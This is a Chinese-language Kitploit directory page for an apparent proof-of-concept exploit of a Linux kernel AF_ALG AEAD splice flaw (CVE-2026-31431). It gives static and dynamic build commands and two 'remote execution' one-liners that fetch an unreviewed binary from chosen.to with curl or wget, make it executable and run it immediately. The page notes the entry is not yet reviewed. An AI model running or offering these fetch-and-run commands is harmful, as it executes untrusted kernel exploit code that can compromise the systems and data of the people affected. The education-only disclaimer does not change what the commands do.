Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-31431 — C 语言移植的一个概念验证,利用 Linux 内核 AF_ALG AEAD splice 逻辑缺陷(CVE-2026-31431),仅供教育研究使用。 | Kitploit
工具/GitHubGitHub/offsecguy/cve-2026-31431
漏洞分析漏洞利用二进制利用
GitHuboffsecguy/cve-2026-31431

CVE-2026-31431

C 语言移植的一个概念验证,利用 Linux 内核 AF_ALG AEAD splice 逻辑缺陷(CVE-2026-31431),仅供教育研究使用。

查看仓库
3个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

copy.fail — AF_ALG AEAD splice 原语(CVE-2026-31431)

概述

本项目是 offsecguy 原始 Python 原型的 C 移植版。
它利用 Linux 内核加密 API(AF_ALG),使用:

  • authencesn(hmac(sha256),cbc(aes)) AEAD 模式
  • MSG_MORE 标志
  • splice() 系统调用

该技术通过加密套接字从只读文件描述符中提取数据,并逐块进行处理。


⚙️ 编译

选项 1 — musl(静态构建)

root@kitploit:~
musl-gcc -static -Os -s -o exp exp.c -I./zlib-1.3.2 -L./zlib-1.3.2 -lz

选项 2 — GCC 静态

root@kitploit:~
gcc exp.c -o exp -lz -s -static

选项 3 — GCC 动态

root@kitploit:~
gcc exp.c -o exp -lz -s

🚀 远程执行

root@kitploit:~
curl -sLo exp chosen.to/copyfail && chmod +x exp ; ./exp
root@kitploit:~
wget chosen.to/copyfail -qO exp && chmod +x exp ; ./exp

⚠️ 注意事项

  • 需要 Linux 内核支持 AF_ALG
  • 使用 zlib 进行解压缩
  • 专为底层内核加密交互与实验而设计

免责声明

此代码仅用于教育和研究目的。
请负责任地使用,且仅限在您获得授权的系统上进行测试。

下载工具